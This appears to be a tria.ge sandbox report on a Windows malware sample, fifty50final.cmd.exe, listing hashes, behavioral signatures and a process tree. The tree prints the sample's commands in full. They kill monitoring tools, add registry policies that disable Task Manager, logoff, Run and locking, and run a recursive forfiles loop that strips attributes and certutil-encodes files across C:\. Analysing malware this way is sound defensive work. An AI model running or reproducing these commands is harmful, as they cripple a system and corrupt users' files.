Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
151s -
max time network
45s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
09/01/2023, 11:08
Static task
static1
Behavioral task
behavioral1
Sample
fifty50final.cmd.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
fifty50final.cmd.exe
Resource
win10v2004-20220812-en
General
-
Target
fifty50final.cmd.exe
-
Size
155KB
-
MD5
99e3c49edfa0934419a87adb9a1d99dd
-
SHA1
4c82fbdda744ce7ccf91e7f07b4ac2efffa68f19
-
SHA256
57ad72c7f7f87aeeff5eaf37d779a72d55a2876e3e95273311189b635b103c16
-
SHA512
2e4b876321e47c2ec98cfaf0989b0e023c3cac76b9e8e0812da975b2d75867041ade89ca7654d3354141c1c429f63d3f01cfe188f32c1013057908c5d3b689fa
-
SSDEEP
3072:XahKyd2n31i5GWp1icKAArDZz4N9GhbkrNEk1tT:XahOmp0yN90QEa
Malware Config
Signatures
-
Disables Task Manager via registry modification
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" fifty50final.cmd.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce fifty50final.cmd.exe -
Drops desktop.ini file(s) 14 IoCs
description ioc Process File opened for modification C:\Program Files\desktop.ini attrib.exe File opened for modification C:\Program Files\desktop.ini attrib.exe File opened for modification C:\Program Files\desktop.ini attrib.exe File opened for modification C:\Program Files\desktop.ini attrib.exe File opened for modification C:\Program Files\desktop.ini attrib.exe File opened for modification C:\Program Files\desktop.ini attrib.exe File opened for modification C:\Program Files\desktop.ini attrib.exe File opened for modification C:\$Recycle.Bin\S-1-5-21-999675638-2867687379-27515722-1000\desktop.ini attrib.exe File opened for modification C:\Program Files\desktop.ini attrib.exe File opened for modification C:\Program Files\desktop.ini attrib.exe File opened for modification C:\Program Files\desktop.ini attrib.exe File opened for modification C:\Program Files\desktop.ini attrib.exe File opened for modification C:\Program Files\desktop.ini attrib.exe File opened for modification C:\Program Files\desktop.ini attrib.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Control Panel\Desktop\Wallpaper reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ipsesp.xml Process not Found File opened for modification C:\Program Files\7-Zip\Lang\nn.txt attrib.exe File created C:\Program Files\7-Zip\Lang\ne.txt.14849 Process not Found File opened for modification C:\Program Files\7-Zip\Lang\fur.txt.14849 Process not Found File opened for modification C:\Program Files\7-Zip\Lang\pt.txt Process not Found File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ipsita.xml Process not Found File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\InputPersonalization.exe Process not Found File opened for modification C:\Program Files\7-Zip\Lang\he.txt Process not Found File opened for modification C:\Program Files\7-Zip\Lang\tt.txt Process not Found File opened for modification C:\Program Files\7-Zip\Lang\gl.txt Process not Found File opened for modification C:\Program Files\7-Zip\Lang\es.txt.14849 attrib.exe File opened for modification C:\Program Files\7-Zip\Lang\ro.txt attrib.exe File opened for modification C:\Program Files\7-Zip\Lang\an.txt.14849 Process not Found File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\hwrfralm.dat Process not Found File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\imjplm.dll Process not Found File opened for modification C:\Program Files\7-Zip\Lang\az.txt attrib.exe File opened for modification C:\Program Files\7-Zip\Lang\pl.txt attrib.exe File opened for modification C:\Program Files\7-Zip\Lang\bg.txt.14849 attrib.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\mshwLatin.dll.mui.14849 Process not Found File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_altgr.xml.14849 Process not Found File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\micaut.dll.14849 Process not Found File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\en-US\ShapeCollector.exe.mui Process not Found File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\IpsMigrationPlugin.dll.mui Process not Found File opened for modification C:\Program Files\AddSync.xlsm.14849 attrib.exe File opened for modification C:\Program Files\7-Zip\Lang\nl.txt Process not Found File opened for modification C:\Program Files\7-Zip\Lang\ast.txt attrib.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\Alphabet.xml Process not Found File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\en-US\mip.exe.mui Process not Found File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\en-US\join.avi Process not Found File opened for modification C:\Program Files\7-Zip\Lang\ko.txt attrib.exe File opened for modification C:\Program Files\7-Zip\Lang\hu.txt attrib.exe File opened for modification C:\Program Files\7-Zip\Lang\lv.txt attrib.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ipskor.xml Process not Found File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ipsen.xml Process not Found File opened for modification C:\Program Files\7-Zip\Lang\ne.txt attrib.exe File opened for modification C:\Program Files\7-Zip\Lang\af.txt attrib.exe File opened for modification C:\Program Files\7-Zip\Lang\cs.txt.14849 Process not Found File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\mshwLatin.dll Process not Found File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ipsplk.xml Process not Found File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\InkObj.dll.mui Process not Found File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\mraut.dll Process not Found File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\Microsoft.Ink.dll Process not Found File opened for modification C:\Program Files\7-Zip\Lang\ext.txt attrib.exe File opened for modification C:\Program Files\7-Zip\Lang\cy.txt attrib.exe File opened for modification C:\Program Files\7-Zip\Lang\he.txt.14849 attrib.exe File opened for modification C:\Program Files\7-Zip\Lang\ko.txt Process not Found File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\hwrcommonlm.dat.14849 Process not Found File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ipsfra.xml.14849 Process not Found File opened for modification C:\Program Files\7-Zip\7z.dll attrib.exe File opened for modification C:\Program Files\7-Zip\Lang\fr.txt.14849 attrib.exe File opened for modification C:\Program Files\7-Zip\Lang\cs.txt Process not Found File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ipscat.xml.14849 Process not Found File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\hwritash.dat.14849 Process not Found File opened for modification C:\Program Files\7-Zip\Lang\ca.txt attrib.exe File opened for modification C:\Program Files\7-Zip\Lang\va.txt Process not Found File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\hwrcatlm.dat.14849 Process not Found File opened for modification C:\Program Files\7-Zip\Lang\cy.txt.14849 Process not Found File opened for modification C:\Program Files\7-Zip\Lang\br.txt Process not Found File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\InkDiv.dll Process not Found File opened for modification C:\Program Files\7-Zip\Lang\eu.txt.14849 attrib.exe File opened for modification C:\Program Files\7-Zip\Lang\nl.txt attrib.exe File opened for modification C:\Program Files\7-Zip\Lang\uz.txt Process not Found File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\hwrcatlm.dat Process not Found File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\hwresmlm.dat Process not Found -
Kills process with taskkill 64 IoCs
pid Process 692 taskkill.exe 828 taskkill.exe 788 Process not Found 612 taskkill.exe 1756 Process not Found 1596 taskkill.exe 1836 Process not Found 1616 Process not Found 1596 Process not Found 964 Process not Found 764 Process not Found 1336 Process not Found 332 Process not Found 1148 taskkill.exe 1688 taskkill.exe 304 Process not Found 1168 Process not Found 680 Process not Found 1880 Process not Found 592 Process not Found 1816 taskkill.exe 1296 Process not Found 1944 Process not Found 1716 taskkill.exe 1248 Process not Found 1836 Process not Found 1932 Process not Found 1764 Process not Found 1068 taskkill.exe 1468 Process not Found 1732 Process not Found 912 taskkill.exe 592 taskkill.exe 1152 taskkill.exe 1456 taskkill.exe 1672 taskkill.exe 1848 Process not Found 660 Process not Found 744 Process not Found 1888 Process not Found 620 taskkill.exe 1628 taskkill.exe 1660 taskkill.exe 1364 taskkill.exe 1560 taskkill.exe 1848 Process not Found 1816 Process not Found 1512 taskkill.exe 1452 taskkill.exe 828 Process not Found 760 taskkill.exe 1880 Process not Found 1464 Process not Found 1884 taskkill.exe 1776 taskkill.exe 852 Process not Found 1516 taskkill.exe 1660 taskkill.exe 1584 Process not Found 744 Process not Found 1528 Process not Found 1428 taskkill.exe 852 Process not Found 1352 Process not Found -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1408 explorer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1088 taskkill.exe Token: SeDebugPrivilege 1640 taskkill.exe Token: SeDebugPrivilege 1716 taskkill.exe Token: SeDebugPrivilege 820 taskkill.exe Token: SeDebugPrivilege 1456 taskkill.exe Token: SeDebugPrivilege 648 taskkill.exe Token: SeDebugPrivilege 1840 taskkill.exe Token: SeShutdownPrivilege 1408 explorer.exe Token: SeShutdownPrivilege 1408 explorer.exe Token: SeShutdownPrivilege 1408 explorer.exe Token: SeShutdownPrivilege 1408 explorer.exe Token: SeShutdownPrivilege 1408 explorer.exe Token: SeShutdownPrivilege 1408 explorer.exe Token: SeShutdownPrivilege 1408 explorer.exe Token: SeShutdownPrivilege 1408 explorer.exe Token: SeShutdownPrivilege 1408 explorer.exe Token: SeShutdownPrivilege 1408 explorer.exe Token: SeDebugPrivilege 1088 attrib.exe Token: SeShutdownPrivilege 1468 shutdown.exe Token: SeRemoteShutdownPrivilege 1468 shutdown.exe Token: 33 1556 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1556 AUDIODG.EXE Token: 33 1556 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1556 AUDIODG.EXE Token: SeDebugPrivilege 1888 taskkill.exe Token: SeShutdownPrivilege 1696 taskkill.exe Token: SeRemoteShutdownPrivilege 1696 taskkill.exe Token: SeDebugPrivilege 852 taskkill.exe Token: SeShutdownPrivilege 1908 cmd.exe Token: SeRemoteShutdownPrivilege 1908 cmd.exe Token: SeDebugPrivilege 820 cmd.exe Token: SeShutdownPrivilege 1732 shutdown.exe Token: SeRemoteShutdownPrivilege 1732 shutdown.exe Token: SeDebugPrivilege 1252 certutil.exe Token: SeShutdownPrivilege 1660 taskkill.exe Token: SeRemoteShutdownPrivilege 1660 taskkill.exe Token: SeDebugPrivilege 1148 taskkill.exe Token: SeShutdownPrivilege 1512 shutdown.exe Token: SeRemoteShutdownPrivilege 1512 shutdown.exe Token: SeDebugPrivilege 1268 taskkill.exe Token: SeShutdownPrivilege 764 shutdown.exe Token: SeRemoteShutdownPrivilege 764 shutdown.exe Token: SeDebugPrivilege 1712 taskkill.exe Token: SeShutdownPrivilege 1644 attrib.exe Token: SeRemoteShutdownPrivilege 1644 attrib.exe Token: SeDebugPrivilege 620 taskkill.exe Token: SeShutdownPrivilege 612 cmd.exe Token: SeRemoteShutdownPrivilege 612 cmd.exe Token: SeDebugPrivilege 1932 taskkill.exe Token: SeShutdownPrivilege 1636 shutdown.exe Token: SeRemoteShutdownPrivilege 1636 shutdown.exe Token: SeDebugPrivilege 1660 taskkill.exe Token: SeShutdownPrivilege 1892 shutdown.exe Token: SeRemoteShutdownPrivilege 1892 shutdown.exe Token: SeDebugPrivilege 1696 taskkill.exe Token: SeShutdownPrivilege 1680 shutdown.exe Token: SeRemoteShutdownPrivilege 1680 shutdown.exe Token: SeShutdownPrivilege 1408 explorer.exe Token: SeShutdownPrivilege 1408 explorer.exe Token: SeDebugPrivilege 868 taskkill.exe Token: SeShutdownPrivilege 1964 shutdown.exe Token: SeRemoteShutdownPrivilege 1964 shutdown.exe Token: SeDebugPrivilege 1960 taskkill.exe Token: SeShutdownPrivilege 944 shutdown.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe -
Suspicious use of SendNotifyMessage 17 IoCs
pid Process 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe 1408 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 368 wrote to memory of 1556 368 fifty50final.cmd.exe 26 PID 368 wrote to memory of 1556 368 fifty50final.cmd.exe 26 PID 368 wrote to memory of 1556 368 fifty50final.cmd.exe 26 PID 368 wrote to memory of 1556 368 fifty50final.cmd.exe 26 PID 368 wrote to memory of 1556 368 fifty50final.cmd.exe 26 PID 1556 wrote to memory of 1336 1556 cmd.exe 28 PID 1556 wrote to memory of 1336 1556 cmd.exe 28 PID 1556 wrote to memory of 1336 1556 cmd.exe 28 PID 368 wrote to memory of 984 368 fifty50final.cmd.exe 29 PID 368 wrote to memory of 984 368 fifty50final.cmd.exe 29 PID 368 wrote to memory of 984 368 fifty50final.cmd.exe 29 PID 984 wrote to memory of 1088 984 cmd.exe 31 PID 984 wrote to memory of 1088 984 cmd.exe 31 PID 984 wrote to memory of 1088 984 cmd.exe 31 PID 984 wrote to memory of 1640 984 cmd.exe 33 PID 984 wrote to memory of 1640 984 cmd.exe 33 PID 984 wrote to memory of 1640 984 cmd.exe 33 PID 984 wrote to memory of 1716 984 cmd.exe 34 PID 984 wrote to memory of 1716 984 cmd.exe 34 PID 984 wrote to memory of 1716 984 cmd.exe 34 PID 984 wrote to memory of 820 984 cmd.exe 35 PID 984 wrote to memory of 820 984 cmd.exe 35 PID 984 wrote to memory of 820 984 cmd.exe 35 PID 984 wrote to memory of 1456 984 cmd.exe 36 PID 984 wrote to memory of 1456 984 cmd.exe 36 PID 984 wrote to memory of 1456 984 cmd.exe 36 PID 984 wrote to memory of 648 984 cmd.exe 37 PID 984 wrote to memory of 648 984 cmd.exe 37 PID 984 wrote to memory of 648 984 cmd.exe 37 PID 984 wrote to memory of 556 984 cmd.exe 38 PID 984 wrote to memory of 556 984 cmd.exe 38 PID 984 wrote to memory of 556 984 cmd.exe 38 PID 984 wrote to memory of 1840 984 cmd.exe 39 PID 984 wrote to memory of 1840 984 cmd.exe 39 PID 984 wrote to memory of 1840 984 cmd.exe 39 PID 984 wrote to memory of 1664 984 cmd.exe 40 PID 984 wrote to memory of 1664 984 cmd.exe 40 PID 984 wrote to memory of 1664 984 cmd.exe 40 PID 984 wrote to memory of 1992 984 cmd.exe 41 PID 984 wrote to memory of 1992 984 cmd.exe 41 PID 984 wrote to memory of 1992 984 cmd.exe 41 PID 984 wrote to memory of 1988 984 cmd.exe 42 PID 984 wrote to memory of 1988 984 cmd.exe 42 PID 984 wrote to memory of 1988 984 cmd.exe 42 PID 984 wrote to memory of 1928 984 cmd.exe 43 PID 984 wrote to memory of 1928 984 cmd.exe 43 PID 984 wrote to memory of 1928 984 cmd.exe 43 PID 984 wrote to memory of 1364 984 cmd.exe 44 PID 984 wrote to memory of 1364 984 cmd.exe 44 PID 984 wrote to memory of 1364 984 cmd.exe 44 PID 984 wrote to memory of 660 984 cmd.exe 45 PID 984 wrote to memory of 660 984 cmd.exe 45 PID 984 wrote to memory of 660 984 cmd.exe 45 PID 984 wrote to memory of 1480 984 cmd.exe 46 PID 984 wrote to memory of 1480 984 cmd.exe 46 PID 984 wrote to memory of 1480 984 cmd.exe 46 PID 984 wrote to memory of 1408 984 cmd.exe 47 PID 984 wrote to memory of 1408 984 cmd.exe 47 PID 984 wrote to memory of 1408 984 cmd.exe 47 PID 984 wrote to memory of 1116 984 cmd.exe 48 PID 984 wrote to memory of 1116 984 cmd.exe 48 PID 984 wrote to memory of 1116 984 cmd.exe 48 PID 1116 wrote to memory of 1772 1116 forfiles.exe 49 PID 1116 wrote to memory of 1772 1116 forfiles.exe 49 -
Views/modifies file attributes 1 TTPs 64 IoCs
pid Process 436 Process not Found 940 Process not Found 1756 Process not Found 1572 Process not Found 1812 Process not Found 852 attrib.exe 1672 attrib.exe 1736 Process not Found 1664 Process not Found 1928 Process not Found 1252 Process not Found 828 Process not Found 1560 Process not Found 820 attrib.exe 900 attrib.exe 912 Process not Found 1884 Process not Found 1628 attrib.exe 1192 Process not Found 1648 attrib.exe 1848 Process not Found 868 Process not Found 1816 attrib.exe 1468 attrib.exe 1752 Process not Found 1616 Process not Found 1464 attrib.exe 1944 attrib.exe 1148 Process not Found 1792 attrib.exe 944 Process not Found 1664 Process not Found 816 Process not Found 680 Process not Found 1148 Process not Found 1880 attrib.exe 1564 attrib.exe 1452 Process not Found 1088 Process not Found 1316 Process not Found 1204 attrib.exe 1336 attrib.exe 1900 Process not Found 1920 Process not Found 1880 attrib.exe 1832 attrib.exe 1528 Process not Found 1560 Process not Found 1888 Process not Found 692 attrib.exe 1700 attrib.exe 1296 attrib.exe 1576 Process not Found 744 Process not Found 1168 Process not Found 1688 attrib.exe 852 Process not Found 1596 Process not Found 1440 attrib.exe 1204 attrib.exe 1596 attrib.exe 1296 Process not Found 1624 Process not Found 592 Process not Found
Processes
-
C:\Users\Admin\AppData\Local\Temp\fifty50final.cmd.exe"C:\Users\Admin\AppData\Local\Temp\fifty50final.cmd.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:368 -
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\setup.cmd2⤵
- Suspicious use of WriteProcessMemory
PID:1556 -
C:\Windows\system32\cscript.execscript //nologo C:\Users\Admin\AppData\Local\Temp\msg.vbs3⤵PID:1336
-
-
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fifty50.cmd2⤵
- Suspicious use of WriteProcessMemory
PID:984 -
C:\Windows\system32\taskkill.exetaskkill /f /im ProcessHacker.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1088
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im procexp.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1640
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im procexp64.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im procmon.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:820
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im procmon64.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1456
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:648
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵PID:556
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im explorer.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1840
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v NoLogoff /t REG_DWORD /d 1 /f3⤵PID:1664
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f3⤵PID:1992
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangePassword /t REG_DWORD /d 1 /f3⤵PID:1988
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d 1 /f3⤵PID:1928
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵PID:1364
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "" /f3⤵
- Sets desktop wallpaper using registry
PID:660
-
-
C:\Windows\system32\rundll32.exerundll32.exe user32.dll,UpdatePerUserSystemParameters3⤵PID:1480
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe3⤵
- Modifies Installed Components in the registry
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1408
-
-
C:\Windows\system32\forfiles.exeforfiles /S /P C:\$Recycle.Bin /C "cmd /c if @isdir==FALSE attrib -s -h -r *.* & certutil -encode -f @file @file.20850 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a"3⤵
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "S-1-5-21-999675638-2867687379-27515722-1000" "S-1-5-21-999675638-2867687379-27515722-1000".20850 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1772
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "desktop.ini" "desktop.ini".20850 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:672
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
PID:900
-
-
C:\Windows\system32\certutil.execertutil -encode -f "desktop.ini" "desktop.ini".208505⤵PID:1848
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1088
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1468
-
-
-
-
C:\Windows\system32\forfiles.exeforfiles /S /P C:\ /C "cmd /c if @isdir==FALSE attrib -s -h -r *.* & certutil -encode -f @file @file.14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a"3⤵PID:1376
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "$Recycle.Bin" "$Recycle.Bin".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1700
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Documents and Settings" "Documents and Settings".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1440
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "MSOCache" "MSOCache".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1428
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "pagefile.sys" "pagefile.sys".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1560
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1680
-
-
C:\Windows\system32\certutil.execertutil -encode -f "pagefile.sys" "pagefile.sys".148495⤵PID:1880
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1888
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1696
-
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "PerfLogs" "PerfLogs".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1928
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Program Files" "Program Files".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1364
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Program Files (x86)" "Program Files (x86)".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:660
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "ProgramData" "ProgramData".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:324
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Recovery" "Recovery".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1268
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "System Volume Information" "System Volume Information".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:576
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Users" "Users".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1764
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2010_x64.log-MSI_vc_red.msi.txt" "vcredist2010_x64.log-MSI_vc_red.msi.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:900
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1920
-
-
C:\Windows\system32\certutil.execertutil -encode -f "vcredist2010_x64.log-MSI_vc_red.msi.txt" "vcredist2010_x64.log-MSI_vc_red.msi.txt".148495⤵PID:1596
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Suspicious use of AdjustPrivilegeToken
PID:852
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1908
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2010_x64.log.html" "vcredist2010_x64.log.html".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1068
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1940
-
-
C:\Windows\system32\certutil.execertutil -encode -f "vcredist2010_x64.log.html" "vcredist2010_x64.log.html".148495⤵PID:692
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:820
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1732
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2010_x86.log-MSI_vc_red.msi.txt" "vcredist2010_x86.log-MSI_vc_red.msi.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1748
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1456
-
-
